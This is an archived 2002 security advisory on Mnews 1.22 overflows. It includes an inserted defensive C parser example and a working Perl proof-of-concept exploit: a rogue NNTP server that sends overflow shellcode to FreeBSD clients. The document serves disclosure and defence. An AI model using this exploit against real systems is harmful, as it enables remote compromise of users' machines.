4th Jun 2002 [SBWID-5395]
COMMAND
Mnews local and remote overflow vulnerabilities
SYSTEMS AFFECTED
version 1.22, maybe older too
PROBLEM
zillion [http://www.snosoft.com] found the following, as reported in the
Strategic Reconnaissance Team Security Advisory (SRT2002-04-31-1159):
Mnews is a small console-based email and news client which is often
installed setgid mail. Several local and remote overflows have been
identified in this package.
Local overflows were found in the -f, -n, -D, -M, -P parameters and in
the JNAMES and MAILSERVER environment variables. The remote overflow
resides in the code responsible for processing responses received from
the NNTP server. For example, the following response will result in an
overflow:
200 <a x 770>
If you look at the source code of mnews you will see that this package
is very outdated and dangerous to use on today's Internet.
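As an added illustration (not mnews code, and not part of the advisory), a bounded NNTP status-line parser that refuses the overlong "200 <a x 770>" response before anything is copied into a fixed-size buffer, which is exactly the check the vulnerable response handler lacks. The 512-byte line limit, the 256-byte text buffer and the function names are assumptions chosen for the example.

```c
/* Added example, not mnews source: bounded handling of an NNTP status line.
 * Rejects overlong or malformed server responses instead of copying them
 * into a fixed buffer. Limits below are assumed values for illustration. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NNTP_MAX_LINE 512   /* assumption: longer status lines are hostile */
#define NNTP_TEXT_MAX 256   /* size of the caller's fixed text buffer */

enum nntp_err { NNTP_OK = 0, NNTP_TOO_LONG = -1, NNTP_BAD_CODE = -2, NNTP_TRUNC = -3 };

/* Parse "NNN text\r\n": store the 3-digit code, copy text into out (bounded). */
int parse_nntp_status(const char *line, int *code, char *out, size_t outsz)
{
    size_t len = strcspn(line, "\r\n");          /* length without CRLF */
    if (len > NNTP_MAX_LINE)
        return NNTP_TOO_LONG;                    /* refuse before any copy */
    if (len < 3 || !isdigit((unsigned char)line[0]) ||
        !isdigit((unsigned char)line[1]) || !isdigit((unsigned char)line[2]))
        return NNTP_BAD_CODE;
    if (len > 3 && line[3] != ' ')
        return NNTP_BAD_CODE;
    *code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
    const char *text = line + (len > 3 ? 4 : 3);
    size_t tlen = len - (size_t)(text - line);
    if (tlen >= outsz)
        return NNTP_TRUNC;                       /* would overflow out[] */
    memcpy(out, text, tlen);
    out[tlen] = '\0';
    return NNTP_OK;
}

/* Build the advisory's style of response: "200 " followed by n 'a' bytes.
 * Constructed test input; the caller frees the result. */
char *make_long_response(size_t n)
{
    char *buf = malloc(4 + n + 3);
    if (!buf) return NULL;
    memcpy(buf, "200 ", 4);
    memset(buf + 4, 'a', n);
    memcpy(buf + 4 + n, "\r\n", 3);
    return buf;
}

int main(void)
{
    char text[NNTP_TEXT_MAX];
    int code;
    char *bad = make_long_response(770);
    printf("benign: %d\n", parse_nntp_status("200 news.example ready\r\n", &code, text, sizeof text));
    printf("hostile: %d\n", parse_nntp_status(bad, &code, text, sizeof text));
    free(bad);
    return 0;
}
```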
Impact
======
Local users might be able to elevate their privileges on the affected
systems. Remote malicious server owners can use mnews to penetrate an
affected system.
Proof of Concept
================
#!/usr/bin/perl -w
#
# Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped
# with the 4.5-RELEASE ports collection.
#
# This exploit is pretty harmless as it only prints a small message to
# stdout (NAI?).
#
# Written by zillion[at]safemode.org (!shit)
#
# http://www.safemode.org
# http://www.snosoft.com
use IO::Socket;

$shellcode =
"\xeb\x21\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88".
"\x5e\x14\x6a\x15\x56\x6a\x01\xb0\x04\x50\xcd\x80\x31\xc0\x50".
"\xb0\x01\x50\xcd\x80\xe8\xda\xff\xff\xff\x23\x57\x61\x73\x73".
"\x73\x73\x75\x70\x70\x70\x70\x70\x20\x21\x21\x20\x3f\x3f\x3f".
"\x23";

# normal \x90 nops don't work here..
$nop = "A";

$esp  = 0xbfbff65e;
$off  = "-70";
$size = 762;

for ($i = 0; $i < ($size - length($shellcode)); $i++) {
    $buffer .= "$nop";
}

$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $off));
$buffer .= pack('l', ($esp + $off));

printf("Starting to listen for incoming connections... buffer size %d\n", length($buffer));
print("The new return address: 0x", sprintf('%lx', ($esp + $off)), "\n");

my $sock = new IO::Socket::INET (
    LocalPort => 119,
    Proto     => 'tcp',
    Listen    => 1,
    Reuse     => 1,
);

while ($cl = $sock->accept()) {
    sleep 1;
    print $cl "200 $buffer\n";
    sleep 3;
}
SOLUTION
Stop using Mnews.